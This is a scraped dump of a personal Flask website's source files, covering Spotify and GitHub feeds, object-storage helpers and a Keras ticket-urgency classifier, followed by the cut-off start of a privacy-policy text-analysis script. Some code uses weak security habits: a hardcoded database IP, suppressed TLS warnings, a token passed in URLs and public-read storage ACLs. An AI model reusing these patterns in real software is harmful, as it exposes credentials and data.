"length_bytes": 413, "license_type": "no_license", "max_line_length": 53, "num_lines": 13, "path": "/austin/models/site_models.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from austin import db\n\n\nclass Configuration(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(120))\n spotify_code = db.Column(db.String(256))\n spotify_access_token = db.Column(db.String(256))\n spotify_refresh_token = db.Column(db.String(256))\n snap_client_id = db.Column(db.String(256))\n\n def __repr__(self):\n return(str(self.id) + \", \" + self.name)\n" }, { "alpha_fraction": 0.6772334575653076, "alphanum_fraction": 0.6785142421722412, "avg_line_length": 33.31867980957031, "blob_id": "a4e0adbd3d2ffe8160837eb341d740b5a3dbd4c8", "content_id": "513bbcbfa1bbf92477d2444ef7ea78ca7de2e044", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3123, "license_type": "no_license", "max_line_length": 93, "num_lines": 91, "path": "/austin/endpoints/main/spotify.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "import json\nimport requests\n\nfrom austin.models.site_models import Configuration\nfrom austin import Config, db\n\n\ndef authenticate_spotify():\n \"\"\" Gets new spotify bearer token \"\"\"\n\n config = Configuration.query.get(1)\n\n # Build out spotify authentication POST\n grant_type = \"grant_type=authorization_code\"\n code = \"&code=\" + config.spotify_code\n redirect_uri = \"&redirect_uri=\" + Config.SPOTIFY_REDIRECT\n client_id = \"&client_id=\" + Config.SPOTIFY_ID\n client_secret = \"&client_secret=\" + Config.SPOTIFY_SECRET\n\n payload = grant_type + code + redirect_uri + client_id + client_secret\n\n headers = {'Content-Type': \"application/x-www-form-urlencoded\"}\n url = 'https://accounts.spotify.com/api/token'\n\n # Once authenticated, Bearer Token will be returned for User data access\n response = requests.post(url, data=payload, headers=headers)\n access_token = json.loads(response.text)['access_token']\n refresh_token = json.loads(response.text)['refresh_token']\n\n # Update Site Configuration Table with Spotify Bearer Token\n config.spotify_access_token = access_token\n config.spotify_refresh_token = refresh_token\n db.session.commit()\n\n\ndef reauth_spotify():\n \"\"\" Get a new Spotify access token with the Refresh token \"\"\"\n\n config = Configuration.query.get(1)\n\n # Build out spotify authentication POST\n grant_type = \"grant_type=refresh_token\"\n refresh_token = \"&refresh_token=\" + config.spotify_refresh_token\n client_id = \"&client_id=\" + Config.SPOTIFY_ID\n client_secret = \"&client_secret=\" + Config.SPOTIFY_SECRET\n\n payload = grant_type + refresh_token + client_id + client_secret\n\n headers = {'Content-Type': \"application/x-www-form-urlencoded\"}\n url = 'https://accounts.spotify.com/api/token'\n\n # Once authenticated, Bearer Token will be returned for User data access\n response = requests.post(url, data=payload, headers=headers)\n access_token = json.loads(response.text)['access_token']\n\n # Update Site Configuration Table with Spotify Bearer Token\n config.spotify_access_token = access_token\n db.session.commit()\n return access_token\n\n\ndef spotify_feed(limit):\n \"\"\" Return # of the most recent Spotify Songs Played \"\"\"\n\n url = \"https://api.spotify.com/v1/me/player/recently-played\"\n querystring = {\"limit\": str(limit)}\n\n headers = {\n 'Authorization': \"Bearer \" + Configuration.query.get(1).spotify_access_token\n }\n\n response = requests.get(url, data=\"\", headers=headers, params=querystring)\n response = json.loads(response.text)\n\n # Check if the Access Token is not expired, if not KeyError will be thrown\n try:\n if response['error']:\n headers = {\n 'Authorization': \"Bearer \" + reauth_spotify()\n }\n\n response = requests.get(\n url, data=\"\", headers=headers, params=querystring)\n response = json.loads(response.text)\n return response\n\n # If Key Error is thrown then there was no error in get request, return original response\n except KeyError:\n return response\n\n return response\n" }, { "alpha_fraction": 0.739234447479248, "alphanum_fraction": 0.7583732008934021, "avg_line_length": 23.58823585510254, "blob_id": "1e6556c252a8104832ec31215cd957e404bedd44", "content_id": "5b64cd7950863ebc5cca4f625df0c78ac4c84d4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 418, "license_type": "no_license", "max_line_length": 77, "num_lines": 17, "path": "/README.md", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "# [PersonalSite](https://austinbalarin.com)\nMy Personal Web App\n\n## A Flask App blog using Linodes Object Storage!\n#### Other things being used\n- Flask-SQLAlchemy\n- Flask-Security\n- boto3\n\n# This app is using Python3\nWhen installing gunicorn make sure its with python3\n```\npip3 install gunicorn\n\n# Update alts to use python3 by default\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3 10\n```\n" }, { "alpha_fraction": 0.4597014784812927, "alphanum_fraction": 0.46791043877601624, "avg_line_length": 32.5, "blob_id": "45d9ae72b315efbf7999c39f33a390005f6158c9", "content_id": "0e893dd0454ac983f7294d7a2cc2d8dcab1db60f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1340, "license_type": "no_license", "max_line_length": 114, "num_lines": 40, "path": "/austin/templates/includes/_spotify.html", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "<div class=\"container\">\n <div class=\"row\">\n {% for item in recently_played['items'] %}\n <div class=\"card container-fluid border rounded-0\">\n <div class=\"row no-gutters\">\n <div class=\"col avatar\">\n <img id=\"github_avatar\" src=\"{{item['track']['album']['images'][0]['url']}}\" alt=\"\">\n </div>\n <div class=\"col-md-8\">\n <div class=\"card-body\">\n <h5>\n {% set uri = item['track']['external_urls']['spotify'] %}\n <a onclick=\"hide_redirect_newwindow('{{uri}}')\">\n <span class=\"a-link\">{{item['track']['name']}}</span>\n </a>\n </h5>\n <h6>\n {% set uri = item['track']['album']['artists'][0]['external_urls']['spotify'] %}\n <a onclick=\"hide_redirect_newwindow('{{uri}}')\">\n <span class=\"a-link\">{{item['track']['album']['artists'][0]['name']}}</span>\n </a>\n </h6>\n\n <p class=\"card-text\"><small class=\"text-muted\">Listend {{date_convert(item['played_at'])}}</small></p>\n </div>\n </div>\n </div>\n </div>\n {% endfor %}\n\n </div>\n\n <div class=\"text-center\">\n <h4 class=\"text-center\">\n <a onclick=\"hide_redirect('/music')\">\n <span class=\"a-link\">See More...</span>\n </a>\n </h4>\n </div>\n</div>\n" }, { "alpha_fraction": 0.6778523325920105, "alphanum_fraction": 0.6939597129821777, "avg_line_length": 32.8636360168457, "blob_id": "76ee4b3b4f59dfabc733ea350da84d080a6e3987", "content_id": "c13ddbcce5a1ef7d62838037b490e2cc29e4ab3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 745, "license_type": "no_license", "max_line_length": 69, "num_lines": 22, "path": "/austin/models/user_models.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from sqlalchemy.sql import func\nfrom flask_login import UserMixin\nfrom austin import db, login_manager\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\nclass User(db.Model, UserMixin):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(120), nullable=False)\n username = db.Column(db.String(120), unique=True, nullable=False)\n email = db.Column(db.String(120), unique=True, nullable=False)\n password = db.Column(db.String(100), nullable=False)\n admin = db.Column(db.Boolean, default=False)\n register_date = db.Column(db.DateTime(\n timezone=True), server_default=func.now())\n\n def __repr__(self):\n return(self.username + \", \" + self.email)\n" }, { "alpha_fraction": 0.6337916254997253, "alphanum_fraction": 0.6538868546485901, "avg_line_length": 29.256000518798828, "blob_id": "f01534b832e82fd21827a392fbef4dac522016bc", "content_id": "158f07c2c7394f1e27927b95ba5e0629adefb0c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3782, "license_type": "no_license", "max_line_length": 137, "num_lines": 125, "path": "/austin/endpoints/main/routes.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from urllib.parse import urlparse\n\nfrom flask import Blueprint, render_template, redirect, request, url_for, jsonify\nfrom flask_login import login_required\n\nfrom dateutil import parser, tz\nimport datetime\nimport requests\n\n# Home built Imports\nfrom austin.endpoints.gallery.utils import get_albums\nfrom .spotify import spotify_feed, authenticate_spotify\nfrom .github import github_feed\nfrom austin.models.site_models import Configuration\nfrom austin import Config, db\n\nmain = Blueprint('main', __name__)\n\n\[email protected]('/')\ndef index():\n snap_id = Configuration.query.get(1).snap_client_id\n return render_template('index.html', albums=get_albums(), changelog=github_feed(5), recently_played=spotify_feed(5), snap_id=snap_id)\n\n\[email protected]('/changelog')\ndef change_log():\n return render_template('activity/github.html')\n\[email protected]('/githubjson/<count>')\ndef githubjson(count):\n return jsonify(github_feed(count))\n\n\[email protected]('/music')\ndef music():\n return render_template('activity/spotify.html', recently_played=spotify_feed(50))\n\n\[email protected]('/spotify')\n@login_required\ndef spotify():\n payload = {\n 'response_type': 'code',\n 'client_id': Config.SPOTIFY_ID,\n 'redirect_uri': Config.SPOTIFY_REDIRECT,\n 'scope': 'user-read-recently-played',\n 'show_dialog': 'true'\n }\n url = 'https://accounts.spotify.com/authorize'\n response = requests.get(url, params=payload)\n\n return redirect(response.url)\n\n# Spotify redirect callback\[email protected]('/callback/')\ndef callback():\n config = Configuration.query.get(1)\n config.spotify_code = urlparse(request.url).query[5:]\n db.session.commit()\n\n authenticate_spotify()\n\n return redirect(url_for('main.index'))\n\n\[email protected]_errorhandler(401)\[email protected]_errorhandler(403)\[email protected]_errorhandler(404)\[email protected]_errorhandler(405)\[email protected]_errorhandler(500)\ndef error_404(error):\n return render_template('errors/404.html', e=error)\n\n\n# This is too slow - optimize\n# Make this request from the client\[email protected]_processor\ndef jinja_api_caller():\n def get_json_from(url):\n return requests.get(url + '?access_token=' + Config.GITHUB_TOKEN).json()\n return dict(get_json_from=get_json_from)\n\n\n# Date-Time Parser\[email protected]_processor\ndef jinja_time_parser():\n def date_convert(date_time):\n\n # This assumes datetime is coming from Zulu/UTC zone & convert to EST\n from_zone = tz.gettz('UTC')\n to_zone = tz.gettz('America/New_York')\n\n # Get Current Time\n time_now = datetime.datetime.now()\n\n # Parse given time into datetime type, convert to EST time\n old_time = parser.parse(date_time)\n old_time = old_time.replace(tzinfo=from_zone).astimezone(to_zone)\n\n # Remove the timezone awareness to calculate time difference\n old_time = old_time.replace(tzinfo=None)\n time_difference = (time_now - old_time).total_seconds()\n\n if time_difference < 60:\n return(str(int(time_difference)) + \" seconds ago\")\n\n elif time_difference < 3600:\n if time_difference < 120:\n return(str(int(time_difference / 60)) + \" minute ago\")\n else:\n return(str(int(time_difference / 60)) + \" minutes ago\")\n\n elif time_difference < 86400:\n if time_difference < 7200:\n return(str(int((time_difference / 60) / 60)) + \" hour ago\")\n else:\n return(str(int((time_difference / 60) / 60)) + \" hours ago\")\n else:\n if time_difference < 172800:\n return(str(int(((time_difference / 60) / 60) / 24)) + \" day ago\")\n else:\n return(str(int(((time_difference / 60) / 60) / 24)) + \" days ago\")\n\n return dict(date_convert=date_convert)\n" }, { "alpha_fraction": 0.6331333518028259, "alphanum_fraction": 0.6365943551063538, "avg_line_length": 30.179855346679688, "blob_id": "91f53ef1da69531aaf4fccf14cc70cb0aaeb4b1b", "content_id": "3cd432c89e53e6bb9d8fc2565de4654a1d8986d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4334, "license_type": "no_license", "max_line_length": 84, "num_lines": 139, "path": "/austin/endpoints/gallery/s3routes.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "#\n# Not in use: These are some sample endpoints for CRUD functions of object Storage\n#\n\nfrom flask import Blueprint, jsonify, request\n\nfrom austin import client, resource\n\n# BOTO STUFF\nfrom austin.botoConfig.objects import *\n\n\nboto3s = Blueprint('boto3s', __name__)\n\n\[email protected]('/buckets', methods=['GET'])\ndef get_buckets():\n try:\n results = listBuckets(client)\n return jsonify(results)\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/buckets', methods=['POST'])\ndef POST_make_bucket():\n try:\n post_values = request.get_json()\n\n name = post_values['bucket_name']\n createBucket(client, name)\n return jsonify({\"result\": \"Bucket created!\"})\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/objects/<bucket>', methods=['GET'])\ndef GET_list_objects(bucket):\n results = listObjects(client, bucket)\n return jsonify(results)\n\n\[email protected]('/objects/<bucket>/<object_file>', methods=['POST'])\ndef POST_add_object(bucket, object_file):\n try:\n files = request.files['file']\n print(files)\n addObject(client, bucket, files, object_file)\n return jsonify({\"result\": \"Object added!\"})\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/download/objects/<bucket>/<object_key>', methods=['GET'])\ndef Download_Object(bucket, object_key):\n try:\n object = downloadObject(\n client, bucket, object_key, Config.APP_ROOT + \"/static/images/test.png\")\n return jsonify({\"result\": \"Object Downloaded!\"})\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/objects/<bucket>/<object_key>', methods=['GET'])\ndef Get_Object(bucket, object_key):\n try:\n object = getObject(client, bucket, object_key)\n print(object)\n return jsonify(object['Body'].read())\n # file = object['Body'].read()\n # file = open(bytes)\n # return render_template('index.html', file=file)\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/objects/<bucket>/<object_key>', methods=['POST'])\ndef change_perms(bucket, object_key):\n try:\n # print(\"WORK\" + ACP['Grants'][0]['Permission'])\n changeObjectPerm(client, bucket, object_key)\n return jsonify({\"result\": \"Object Updated!\"})\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/url/<bucket>/<object_id>', methods=['GET'])\ndef geturl(bucket, object_id):\n try:\n object = getURL(client, bucket, object_id)\n return jsonify(object)\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/location/<bucket>', methods=['GET'])\ndef getloco(bucket):\n try:\n object = getBucketLocation(client, bucket)\n return jsonify(object)\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/curl/<bucket>', methods=['GET'])\ndef createurl(bucket):\n try:\n createURL(client, bucket)\n return jsonify({\"result\": \"URL Created!\"})\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/bucketperm/<bucket>', methods=['GET'])\ndef getBucketPerms(bucket):\n try:\n return jsonify(bucketPermissions(client, bucket))\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/bucketperm/<bucket>', methods=['PUT'])\ndef chgBucketPerms(bucket):\n try:\n changeBucketPermissions(resource, bucket)\n return jsonify(bucketPermissions(client, bucket))\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n" }, { "alpha_fraction": 0.6886792182922363, "alphanum_fraction": 0.7006860971450806, "avg_line_length": 29.6842098236084, "blob_id": "1a49fbe76208586b102310461fb5861e765e6ea8", "content_id": "8dfec6b14cf26811cdfea7d6b4cea1c7a435485e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1166, "license_type": "no_license", "max_line_length": 129, "num_lines": 38, "path": "/austin/endpoints/machinelearning/routes.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from flask import Blueprint, render_template, redirect, request, url_for\nfrom flask_login import login_required\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport os\n\nfrom .utils import load_md\nfrom .urgency_model import urgency_model\nfrom austin.config import Config\n\nml = Blueprint('ml', __name__)\n\n\[email protected]('/urgency')\ndef index():\n html = load_md(\"urgency.md\")\n return render_template('machinelearning/urgency.html', md=html)\n\n\[email protected]('/classify', methods=['POST'])\ndef classify():\n model = urgency_model(10000)\n filepath = Config.APP_ROOT + \"/models/ml_models/cp.ckpt\"\n model.load_weights(filepath)\n\n text = request.form.get('ticket_body')\n matrix = keras.preprocessing.text.one_hot(text, 10000, filters='!\"#$%&()*+,-./:;<=>?@[\\\\]^_`{|}~\\t\\n', lower=True, split=' ')\n\n matrix = keras.preprocessing.sequence.pad_sequences([matrix], maxlen=500)\n\n # Prediction\n probability = model.predict(matrix)\n prediction_label = probability.argmax(axis=-1)\n print(prediction_label)\n\n html = load_md(\"urgency.md\")\n return render_template('machinelearning/urgency_prediction.html', prediction=prediction_label, md=html)\n" }, { "alpha_fraction": 0.4997677803039551, "alphanum_fraction": 0.5940548181533813, "avg_line_length": 49.069766998291016, "blob_id": "145f50dfba388762ef11efc802086dd01a9ceba7", "content_id": "a9ba81d3dd010a20547200c4f54af5e075d5af4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2153, "license_type": "no_license", "max_line_length": 305, "num_lines": 43, "path": "/austin/static/markdown/urgency.md", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "# How Does this Model Work?\n### Layers:\n- One-Hot-Encoding\n- Padding\n- Embedding\n- 1D Convolution\n- Flatten\n- Densely Connected layer 1 of size 250\n- Densely Connected layer 2 of size 1\n\n## One-Hot-Encoding\n> *While this may not technically be considered a Keras layer, a transformation of the original input occurs, and I'm considering it layer from a practicality standpoint.*\n\nOnce a text body is parsed into and array of size **n** words ie: [\"A\", \"Quick\", \"Brown\" ... n], a filter of sorts is applied that maps every word to its respective index in a vocabulary.\n\nAn example conversion for a text with a vocabulary size 10,000 might look like the following:\n\n1. `\"A quick brown fox jumps over the fence\"`\n2. `[\"A\", \"quick\", \"brown\", \"fox\", \"jumps\", \"over\", \"the\", \"fence\"]`\n3. `[1, 5303, 9410, 9492, 7585, 5776, 520, 3212]`\n\nWhere every word is mapped to an index between 1 and 10,000\n\n## Padding\n> *Same as one-hot-encoding, this is technically not a Keras layer, but a transformation is performed...*\n\nSince every input might be a different length of words, when we pass it though the convolutional layers of our network (and reduce vector size) we would like to preserve some characteristics of the original pattern of text. We also want to kinda normalize the first convolution by standardizing the input.\n\nSo if we say the padding is the size of the maximum amount of words in a single input, lets say 100, we might get an output like the following:\n\n1. `[\"A\", \"quick\", \"brown\", \"fox\", \"jumps\", \"over\", \"the\", \"fence\"]`\n2. `[1, 5303, 9410, 9492, 7585, 5776, 520, 3212]`\n3. `[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 1 5303 9410 9492 7585 5776\n 520 3212]`\n\n\n##### *To be continued...*\n" }, { "alpha_fraction": 0.6567363142967224, "alphanum_fraction": 0.6567363142967224, "avg_line_length": 25.458824157714844, "blob_id": "31cb79c6fff4627b8fffe34da266f78d8053e369", "content_id": "a4aa9aee0e9912e8cc5384df9bf3b1bf036dc322", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2249, "license_type": "no_license", "max_line_length": 100, "num_lines": 85, "path": "/austin/botoConfig/objects.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "def createBucket(client, name):\n client.create_bucket(Bucket=name)\n\n\ndef addObject(client, bucket, file, filename):\n client.put_object(ACL=\"public-read\", Body=file,\n Bucket=bucket, Key=filename, ContentType='image/jpeg')\n\n\ndef downloadObject(client, bucket, object_key, local_file):\n returned_object = client.download_file(bucket, object_key, local_file)\n return returned_object\n\n\ndef getObject(client, bucket, object_key):\n returned_object = client.get_object(Bucket=bucket, Key=object_key)\n return returned_object\n\n\ndef listObjects(client, bucket):\n objects = []\n for key in client.list_objects(Bucket=bucket)['Contents']:\n objects.append(key['Key'])\n return objects\n\n\ndef listBuckets(client):\n return client.list_buckets()\n\n\ndef objectPermissions(client, bucket, object_key):\n return client.get_object_acl(Bucket=bucket, Key=object_key)\n\n\ndef changeObjectPerm(client, bucket, object_key):\n\n ACP = {\n 'Grants': [{\n 'Grantee': {\n 'DisplayName': 'Everyone',\n 'Type': 'Group',\n },\n 'Permission': 'READ',\n }]\n }\n\n # Convert the policy to a JSON string\n # policy = json.dumps(ACP)\n\n client.put_object_acl(ACL='public-read', AccessControlPolicy=ACP, Bucket=bucket, Key=object_key)\n\n\ndef bucketPermissions(client, bucket):\n return client.get_bucket_acl(Bucket=bucket)\n\n\ndef changeBucketPermissions(resource, bucket):\n bucket_acl = resource.BucketAcl(bucket)\n bucket_acl.put(ACL=\"public-read\")\n\n\ndef getURL(client, bucket, obj_key):\n return client.generate_presigned_post(Bucket=bucket, Key=obj_key)\n\n\ndef getBucketLocation(client, bucket):\n return client.get_bucket_location(Bucket=bucket)\n\n\ndef createURL(client, bucket):\n # Create the configuration for the website\n website_configuration = {\n 'ErrorDocument': {'Key': 'error.html'},\n 'IndexDocument': {'Suffix': 'index.html'},\n 'RedirectAllRequestsTo': {\n 'HostName': 'austinbalarin.com',\n 'Protocol': 'http'\n }\n }\n\n # Set the new policy on the selected bucket\n client.put_bucket_website(\n Bucket=bucket,\n WebsiteConfiguration=website_configuration\n )\n" }, { "alpha_fraction": 0.6500530242919922, "alphanum_fraction": 0.6532343626022339, "avg_line_length": 24.486486434936523, "blob_id": "6ff4ebeb427d99f32b918dc18cc57a3b6966043b", "content_id": "d8f9797c4297ddfb0ac6b279eb71fa61bf04b912", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 943, "license_type": "no_license", "max_line_length": 84, "num_lines": 37, "path": "/austin/endpoints/gallery/routes.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from flask import Blueprint, render_template, jsonify, request, abort\nfrom flask_login import login_required\n\nfrom .utils import list_albums, get_images\n\n\ngallery = Blueprint('gallery', __name__)\n\n\[email protected]('/albums', methods=['GET'])\ndef get_buckets():\n try:\n results = list_albums()\n return jsonify(results)\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/<album>/images', methods=['GET'])\ndef get_album(album):\n try:\n return render_template('gallery/gallery.html', links=get_images(album))\n\n except Exception as e:\n print(e)\n return abort(404)\n\n\n# @gallery.route('/create/album', methods=['GET'])\n# @login_required\n# def create_album():\n# if request.method == \"POST\":\n# return render_template('gallery/add_album.html')\n#\n# return render_template('gallery/add_album.html')\n#\n" }, { "alpha_fraction": 0.7166891098022461, "alphanum_fraction": 0.7180349826812744, "avg_line_length": 29.95833396911621, "blob_id": "f5dc17ad22b6be955413062564f52b57b337b00c", "content_id": "4ddeca576ff4f38850304c69aea5083e01199aa7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 124, "num_lines": 48, "path": "/austin/__init__.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from flask import Flask, session\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\n\n\nfrom austin.config import Config\nfrom austin.botoConfig.configer import getConfig\nfrom austin.botoConfig.authBoto import botoClient, botoResource\n\nconfig = getConfig(Config.APP_ROOT + '/botoConfig/config.ini')\nclient = botoClient(Config.BOTO_KEY, Config.BOTO_SECRET, config['object_api']['base_url'], config['object_api']['user'])\nresource = botoResource(Config.BOTO_KEY, Config.BOTO_SECRET, config['object_api']['base_url'], config['object_api']['user'])\n\ndb = SQLAlchemy()\nlogin_manager = LoginManager()\n\n\ndef create_app(class_config=Config):\n\n app = Flask(__name__)\n app.config.from_object(Config)\n\n @app.before_request\n def visits():\n if 'visit_count' in session:\n session['visit_count'] = session.get('visit_count') + 1\n else:\n session['visit_count'] = 1\n\n # Init app contenxts\n db.init_app(app)\n\n # Init Logi Manager\n from austin.models.user_models import load_user\n login_manager.init_app(app)\n login_manager.user_loader(load_user)\n\n from austin.endpoints.main.routes import main\n from austin.endpoints.users.routes import users\n from austin.endpoints.gallery.routes import gallery\n from austin.endpoints.machinelearning.routes import ml\n\n app.register_blueprint(main)\n app.register_blueprint(users)\n app.register_blueprint(gallery)\n app.register_blueprint(ml)\n\n return app\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.6951566934585571, "avg_line_length": 20.9375, "blob_id": "2560ac1719aa8c6c25942828cf0094ef2c9ff156", "content_id": "8b792e064f554f20a60224ac29dd3acf28730277", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 351, "license_type": "no_license", "max_line_length": 66, "num_lines": 16, "path": "/austin/endpoints/machinelearning/utils.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "import codecs\nimport markdown\nfrom flask import Markup\n\nfrom austin.config import Config\n\n\ndef load_md(filename):\n\n filepath = Config.APP_ROOT + \"/static/markdown/\" + filename\n input_file = codecs.open(filepath, mode=\"r\", encoding=\"utf-8\")\n text = input_file.read()\n\n html = markdown.markdown(text)\n html = Markup(html)\n return html\n" }, { "alpha_fraction": 0.6476345658302307, "alphanum_fraction": 0.6769983768463135, "avg_line_length": 35.05882263183594, "blob_id": "c215093a58dcf2cf79396a97119499104ad7434f", "content_id": "e6f1934feff1aad6a5f2d941ea2cec4acb89f561", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 90, "num_lines": 17, "path": "/austin/endpoints/machinelearning/urgency_model.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nfrom tensorflow import keras\n\ndef urgency_model(max_vocabulary):\n model = keras.Sequential([\n keras.layers.Embedding(max_vocabulary, 32, input_length=500),\n keras.layers.Conv1D(filters=32, kernel_size=3, padding='same', activation='relu'),\n keras.layers.MaxPooling1D(pool_size=2),\n keras.layers.Flatten(),\n keras.layers.Dense(250, activation='relu'),\n keras.layers.Dropout(.025),\n keras.layers.Dense(1, activation='sigmoid')\n ])\n\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n return model\n" }, { "alpha_fraction": 0.6521317958831787, "alphanum_fraction": 0.6686046719551086, "avg_line_length": 26.891891479492188, "blob_id": "94d981307abdc3171ea85a475fac23d687625725", "content_id": "cde42187da4a7bcf4f3924f9257f6fd1741804a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1032, "license_type": "no_license", "max_line_length": 107, "num_lines": 37, "path": "/austin/config.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "import os\n\nimport json\nimport urllib3\nurllib3.disable_warnings()\n\nwith open(os.path.dirname(os.path.abspath(__file__)) + '/config.json') as config_file:\n config = json.load(config_file)\n\nclass Config():\n\n SECRET_KEY = os.urandom(12)\n\n # Postgres keys\n DB_USER = config.get('DB_USER')\n DB_PASS = config.get('DB_PASS')\n\n # Connection to Postgres server\n SQLALCHEMY_DATABASE_URI = 'postgresql://' + DB_USER + ':' + DB_PASS + '@45.33.79.194:5432/austinbalarin'\n\n # To suppress FSADeprecationWarning\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n # boto3 Keys for Object Storage\n BOTO_KEY = config.get('BOTO_KEY')\n BOTO_SECRET = config.get('BOTO_SECRET')\n\n # Github OAuth\n GITHUB_TOKEN = config.get('GITHUB_TOKEN')\n\n # Gets pwd and declares it is the root dir for the App\n APP_ROOT = os.path.dirname(os.path.abspath(__file__))\n\n # Spotify Stuff\n SPOTIFY_REDIRECT = config.get('SPOTIFY_REDIRECT')\n SPOTIFY_ID = config.get('SPOTIFY_ID')\n SPOTIFY_SECRET = config.get('SPOTIFY_SECRET')\n" } ]
18
athenac7842/cs105_athena
https://github.com/athenac7842/cs105_athena
d79993924c9143ff1029aa56e87069556bad09c9
1d8bcb5c5ae477e7564cc2820c6a20d57076d4fd
a50a5bbe504db940cb9f2e7b382798583786e035
refs/heads/main
2023-07-29T11:36:22.463390
2021-09-11T21:00:26
2021-09-11T21:00:26
405,479,797
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6788389682769775, "alphanum_fraction": 0.6975655555725098, "avg_line_length": 19.901960372924805, "blob_id": "3650c43cc9bd27350cf050e01e3f50d516357ab2", "content_id": "c805eeed0f5fef6ef50ebdb78da33a84862046e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2136, "license_type": "no_license", "max_line_length": 165, "num_lines": 102, "path": "/policyanalysis.py", "repo_name": "athenac7842/cs105_athena", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# Analyze Privacy Policies\n\n# https://pypi.org/project/textstat/\n# https://colab.research.google.com/github/mohammedterry/NLP_for_ML/blob/master/Sentiment_Analysis.ipynb#scrollTo=0PWxpQSAO6x2\n# https://medium.com/@prakash507979/how-to-read-pdf-file-using-python-1e4269a5f75f\n# https://colab.research.google.com/github/computationalcore/introduction-to-python/blob/master/notebooks/4-files/PY0101EN-4-1-ReadFile.ipynb\n\n# In[ ]:\n\n\n\n\n\n# In[1]:\n\n\n#packages (do once)\nget_ipython().system('pip install textstat')\n\n\n# In[40]:\n\n\n#libraries\nimport textstat\nimport pandas as pd\nimport os\nimport glob\n\nfrom collections import Counter\n\n#sentiment analysis\nimport nltk\nnltk.download('vader_lexicon')\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nsid = SentimentIntensityAnalyzer()\n\n\n# In[81]:\n\n\n#count word frequencies\ndef wordfreq(text):\n ltext = text.lower()\n skips = [\".\", \",\",\":\", \";\", \"!\", \"?\",'\"']\n for i in skips: \n ltext = ltext.replace(i, \"\")\n\n 